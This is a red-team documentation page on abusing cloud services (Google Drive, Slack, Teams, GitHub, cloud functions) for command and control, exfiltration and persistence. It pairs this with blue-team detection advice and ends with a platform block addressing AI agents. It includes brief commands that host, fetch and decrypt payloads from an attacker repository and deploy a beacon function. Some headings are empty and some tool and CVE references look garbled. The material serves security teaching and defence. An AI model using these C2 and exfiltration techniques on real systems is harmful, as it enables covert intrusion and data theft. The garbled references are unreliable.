> For the complete documentation index, see [llms.txt](https://aenosh-rajora.gitbook.io/cyber-codex/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aenosh-rajora.gitbook.io/cyber-codex/living-off-the-cloud-abusing-cloud-services-for-red-teaming.md). # Living Off the Cloud: Abusing Cloud Services for Red Teaming

*** #### Introduction: Blending into the Digital Skyline Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries especially Advanced Persistent Threats (APTs) are turning to **trusted cloud services** to operate invisibly. This technique is called **Living Off The Cloud (LOTC)**. and it’s rapidly becoming a staple of Red Team and nation-state toolkits. Just like **Living Off the Land (LOTL)** involves using native OS tools, **LOTC uses cloud-based infrastructure you probably already trust.** #### Why it Works **Cloud services are:** * Widely used and trusted: Firewalls and proxies often allow their traffic. * Encrypted by default: Most use HTTPs, making inspection harder. * Hard to blacklist: You can’t just block Google or Microsoft in most organizations. * Globally available: Attackers don’t need infrastructure, just an account. ## Red Teaming Use Cases ### **Command and Control via Google Drive or Dropbox** #### **TTP Flow:** * Attacker drops payloads into shared cloud folder. * Infected host polls folder every 30s via scheduled task or beacon. * Exfiltrated data (e.g., screenshots, keystrokes) uploaded as new files. #### **Tools:** * `Silver` + Google Drive API * `gdrive`: CLI for file uploads/downloads ``` gdrive upload C2_payload.exe gdrive download --path /tmp tasking.json ``` **Why it works:** Google Drive traffic blends in with normal productivity behavior. ### **Slack or Microsoft Teams as C2 Channels** TTP Flow: * Slack bot posts commands in a private channel. * Compromised endpoints polls the channel and executes. * Output posted back as messages. **Abuse Example:** Slack webhook: [`https://hooks.slack.com/services/XXXX/YYYY/ZZZZ`](https://hooks.slack.com/services/XXXX/YYYY/ZZZZ) **GitHub PoC:** * `slack-shell` * `TeamC2` abusing Microsoft Teams (CVE-2023–23397 related abuse scenario) **Reference:** APT29 allegedly used Microsoft Teams to deliver malware-laced documents via chat in a 2023 attack > **Bonus:** Many orgs run Slack in-browser or as a native app again, trusted traffic. ### **Payload Hosting via GitHub Repositories** GitHub repositories (public or private) can host: * Encrypted payloads or scripts * Infrastructure-as-code (IaC) templates for dynamic infrastructure. * Configuration files used by implants * HTTPS and CDN delivery Tool Example: * `gitC2`: C2 over GitHub repos. ``` git clone https://github.com/attacker/payloads.git gpg --decrypt payload.bin.gpg ``` ### **Persistence via Cloud Functions** Cloud functions allow **event-driven execution** in the cloud. Perfect for stealthy persistence. **Platforms:** * **AWS Lambda** * **Google Cloud Functions** * **Azure Functions** Red Team Use: * Trigger C2 beacon on HTTP request * Inject shellcode into warm function containers * Auto-deploy second-stage payloads ``` gcloud functions deploy beacon --runtime python39 --trigger-http ``` ## Blue Teams: Defending Against LOTC Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing: ### **Monitor for Anomalous Cloud Services** * **OAuth token abuse:** Unknown apps with high permissions * **Personal cloud storage:** Used from corporate devices * **API usage spikes:** Especially to Slack, GitHub, Dropbox ### **Inspect DNS and HTTPs Metadata** Even if payloads are encrypted, patterns like: * Repeated traffic to non-standard subdomains * Odd timing patterns (e.g., beaconing every 30s) * Known cloud URLs used in unusual ways ### **Logs Everything You Can** * Enable audit logs on cloud platforms (e.g., Google Workspace, M365) * Monitor file sharing activity and access patterns. * Look for out-of-place automation, like rogue bots, unknown Lambda functions, GitHub webhook abuses. ### **Analyze DNS + HTTPS Metadata** Even if payloads are encrypted, behaviours reveal intent:

## CVEs, Zero-days, and weaknesses Enabling LOTC

## Future of LOTC: AI-Enhaned Attacks? with the rise of **GenAI and Cloud**, imagine: * GPT-generated phishing via Microsoft 365 * Dynamic payload generation hosted on GitHub Actions * AI-controlled implants communicating via AI API (e.g., OpenAI, Anthropic) ## Try it Yourself Simulated Red Team scenario using cloud-based C2 Check out: * **Mythic C2 Framework:** {% embed url="" %} * **Silver C2:** {% embed url="" %} * **Red Canary’s Atomic Red Team Cloud TTPs:** {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aenosh-rajora.gitbook.io/cyber-codex/living-off-the-cloud-abusing-cloud-services-for-red-teaming.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.